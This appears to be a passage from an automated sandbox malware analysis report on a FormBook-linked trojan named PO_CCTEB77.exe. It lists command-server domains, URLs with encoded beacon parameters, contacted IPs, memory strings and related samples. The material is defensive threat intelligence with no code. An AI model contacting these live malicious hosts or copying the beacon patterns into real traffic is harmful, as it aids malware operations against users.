            http://www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX0%Avira URL Cloudsafe
            http://www.611erhm.top/ahec/100%Avira URL Cloudphishing
            http://www.611erhm.top/ahec/?KHcH=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJLbH8mycsz0Gg==&Vjk=-N-tntX100%Avira URL Cloudphishing
            http://altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.makeinai.online
            		37.140.192.89
            		truefalseunknown
            www.nesmalt.info
            		66.29.155.54
            		truefalseunknown
            www.611erhm.top
            		34.117.26.57
            		truefalseunknown
            fam-scharf.net
            		81.169.145.70
            		truefalseunknown
            instantconvey.com
            		131.153.147.90
            		truefalseunknown
            natroredirect.natrocdn.com
            		85.159.66.93
            		truefalseunknown
            altralogos.com
            		185.74.252.11
            		truefalseunknown
            alldaysslimmingstea.com
            		162.222.226.77
            		truefalseunknown
            wrautomotive.online
            		37.97.254.27
            		truefalseunknown
            www.jones4deepriver.com
            		74.208.236.181
            		truefalseunknown
            www.domainappraisalbot.com
            		94.23.162.163
            		truefalseunknown
            thecoloringbitch.com
            		162.241.252.161
            		truefalseunknown
            www.poria.link
            		172.67.184.73
            		truefalseunknown
            www.77moea.top
            		34.120.55.112
            		truefalseunknown
            www.magmadokum.com
            		unknown
            		unknowntrueunknown
            www.altralogos.com
            		unknown
            		unknowntrueunknown
            www.wrautomotive.online
            		unknown
            		unknowntrueunknown
            www.instantconvey.com
            		unknown
            		unknowntrue
              		unknown
              www.thecoloringbitch.com
              		unknown
              		unknowntrueunknown
              www.alldaysslimmingstea.com
              		unknown
              		unknowntrueunknown
              www.fam-scharf.net
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.domainappraisalbot.com/ahec/?KHcH=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JEVJR030KrPkQ==&Vjk=-N-tntXfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.fam-scharf.net/ahec/?Vjk=-N-tntX&KHcH=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUxaOpL3PpxqeQ==false
              • Avira URL Cloud: malware
              		unknown
              http://www.nesmalt.info/ahec/?Vjk=-N-tntX&KHcH=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRude7iecelPQFgCQ==false
              • Avira URL Cloud: malware
              		unknown
              http://www.jones4deepriver.com/ahec/?KHcH=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBsblhtcQm5YDg==&Vjk=-N-tntXfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.poria.link/ahec/false
              • 3%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.77moea.top/ahec/?Vjk=-N-tntX&KHcH=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy86ItGv6ERTYYg==false
              • Avira URL Cloud: phishing
              		unknown
              http://www.nesmalt.info/ahec/false
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.magmadokum.com/ahec/false
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.fam-scharf.net/ahec/false
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.77moea.top/ahec/false
              • Avira URL Cloud: phishing
              		unknown
              http://www.makeinai.online/ahec/?KHcH=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0uXSPTvTu0ZjA==&Vjk=-N-tntXfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntXfalse
              • Avira URL Cloud: malware
              		unknown
              http://www.makeinai.online/ahec/false
              • 2%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.thecoloringbitch.com/ahec/false
              • 8%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.wrautomotive.online/ahec/false
              • Avira URL Cloud: safe
              		unknown
              http://www.magmadokum.com/ahec/?KHcH=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvE3/6rCIhWfjw==&Vjk=-N-tntXfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.domainappraisalbot.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.thecoloringbitch.com/ahec/?Vjk=-N-tntX&KHcH=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA76IWuP2FlzTnw==false
              • Avira URL Cloud: malware
              		unknown
              http://www.jones4deepriver.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.poria.link/ahec/?Vjk=-N-tntX&KHcH=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VjrVHIYZDWS5A==false
              • Avira URL Cloud: malware
              		unknown
              http://www.instantconvey.com/ahec/?Vjk=-N-tntX&KHcH=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClw6x6iQ2E33Xw==false
              • Avira URL Cloud: malware
              		unknown
              http://www.altralogos.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.instantconvey.com/ahec/false
              • Avira URL Cloud: malware
              		unknown
              http://www.alldaysslimmingstea.com/ahec/?Vjk=-N-tntX&KHcH=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVPoMkTtjkNnJA==false
              • Avira URL Cloud: malware
              		unknown
              http://www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntXfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.611erhm.top/ahec/false
              • Avira URL Cloud: phishing
              		unknown
              http://www.611erhm.top/ahec/?KHcH=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJLbH8mycsz0Gg==&Vjk=-N-tntXfalse
              • Avira URL Cloud: phishing
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabisoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsisoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsisoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                      		high
                      https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://track.uc.cn/collectisoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                          		high
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                              		high
                              https://files.reg.ru/fonts/inter/Inter-Regular.woff)isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                		high
                                https://hm.baidu.com/hm.js?isoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchisoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsisoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO_CCTEB77.exe, 00000000.00000002.2045447270.00000000031A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.reg.ru/service/prolong_period_anonymous?servtype=srv_hosting_ispmgr&amp;dname_or_ip=isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckkisoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://cdn.jsinit.directfwd.com/sk-jspark_init.phpisoburn.exe, 00000005.00000002.4476014647.0000000005796000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000002E76000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2368458736.00000000049B6000.00000004.80000000.00040000.00000000.sdmpfalse
                                          • 13%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://mozilla.org0/isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://crash-reports.mozilla.com/submit?id=isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoisoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://files.reg.ru/fonts/inter/Inter-Medium.woff2)isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://2domains.ruisoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.ecosia.org/newtab/isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Database1DataSet.xsdPO_CCTEB77.exefalse
                                                        • 1%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.reg.ru/hosting/isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://www.wrautomotive.onlineAQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4479415286.0000000004E26000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://files.reg.ru/fonts/inter/Inter-Medium.woff)isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.reg.ru/hostingAQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://files.reg.ru/fonts/inter/Inter-Regular.woff2)isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.cssisoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=isoburn.exe, 00000005.00000003.2315895532.00000000082AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Zisoburn.exe, 00000005.00000002.4476014647.00000000068DC000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003FBC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.jsisoburn.exe, 00000005.00000002.4476014647.0000000006A6E000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4480922453.0000000007970000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4476014647.0000000006294000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.0000000003974000.00000004.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000414E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reg.ru?target=_blankisoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          131.153.147.90
                                                                          		instantconvey.comUnited States
                                                                          		19437SS-ASHUSfalse
                                                                          37.97.254.27
                                                                          		wrautomotive.onlineNetherlands
                                                                          		20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                                                                          162.241.252.161
                                                                          		thecoloringbitch.comUnited States
                                                                          		46606UNIFIEDLAYER-AS-1USfalse
                                                                          94.23.162.163
                                                                          		www.domainappraisalbot.comFrance
                                                                          		16276OVHFRfalse
                                                                          34.117.26.57
                                                                          		www.611erhm.topUnited States
                                                                          		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                          162.222.226.77
                                                                          		alldaysslimmingstea.comUnited States
                                                                          		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                          34.120.55.112
                                                                          		www.77moea.topUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          85.159.66.93
                                                                          		natroredirect.natrocdn.comTurkey
                                                                          		34619CIZGITRfalse
                                                                          185.74.252.11
                                                                          		altralogos.comLithuania
                                                                          		59939WIBO-ASLTfalse
                                                                          81.169.145.70
                                                                          		fam-scharf.netGermany
                                                                          		6724STRATOSTRATOAGDEfalse
                                                                          37.140.192.89
                                                                          		www.makeinai.onlineRussian Federation
                                                                          		197695AS-REGRUfalse
                                                                          74.208.236.181
                                                                          		www.jones4deepriver.comUnited States
                                                                          		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                          66.29.155.54
                                                                          		www.nesmalt.infoUnited States
                                                                          		19538ADVANTAGECOMUSfalse
                                                                          172.67.184.73
                                                                          		www.poria.linkUnited States
                                                                          		13335CLOUDFLARENETUSfalse

                                                                          General Information

                                                                          Joe Sandbox Version:38.0.0 Ammolite
                                                                          Analysis ID:1352162
                                                                          Start date and time:2023-12-02 18:46:19 +01:00
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 11m 21s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:8
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:2
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample file name:PO_CCTEB77.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@15/14
                                                                          EGA Information:
                                                                          • Successful, ratio: 75%
                                                                          HCA Information:
                                                                          • Successful, ratio: 94%
                                                                          • Number of executed functions: 204
                                                                          • Number of non-executed functions: 293
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          18:47:09API Interceptor18x Sleep call for process: PO_CCTEB77.exe modified
                                                                          18:48:00API Interceptor10204816x Sleep call for process: isoburn.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          131.153.147.90PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • www.instantconvey.com/ahec/?TrRXYB=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dFlwn16ST0xT3ScnWnfliYcAA&NRpHp=DLPh_Z
                                                                          37.97.254.27Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP
                                                                          Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • www.wrautomotive.online/ahec/?TrRXYB=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+z0orNAnxbm6AOaCZvJNva1SPD&NRpHp=DLPh_Z
                                                                          25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.rocsys.net/uaaq/?Zvo88=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==&5j=JXHP5xY8
                                                                          PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                          • www.qa-manny.com/cvps/?ojQxW=_LZhZtRhEB2XP&-Lkxp=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                          • www.wrautomotive.online/fdo5/?7F=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&zf7=WxIPUXb0
                                                                          Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • www.kermisbedrijfkramer.online/ao65/?Urwl=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&S0GhC=_R-phJeXT
                                                                          INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                          • www.qa-manny.com/cvps/?kDuhz=t6NP562HYH_&pf5=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                                          137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                          • www.rocsys.net/g81o/?t8F43Dx=Xpn7ovWGDL38rcQsVj9M+fSKcj+67g3pDTSuqHneUyb3n+qAvdqStutd5ioDJ87L1Kdi6p0jXbywk+j2nUztgIlZl1ilwP64qP32EII=&xphPK=azPpsjMX1
                                                                          NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.rocsys.net/uaaq/?w89D=LxmD0p&UX=ZvgtLzuC5J0fwHYxUOhDE7BocrPe2y3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09mUhv++5catqsVQ==
                                                                          003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • www.kermisbedrijfkramer.online/ao65/?GR0=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS1HIoJcoA9wm&IDK=RJBh5RS0IZO8zhrP
                                                                          Document.exeGet hashmaliciousFormBookBrowse
                                                                          • www.qa-manny.com/cvps/?Tb-PA8s8=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==&0H=BrFhG8npvv
                                                                          Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • www.kermisbedrijfkramer.online/ao65/?2d=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/hhpQTPLNwMSzDew==&3fC=vZeTzRlX84SHE
                                                                          Invoice.exeGet hashmaliciousUnknownBrowse
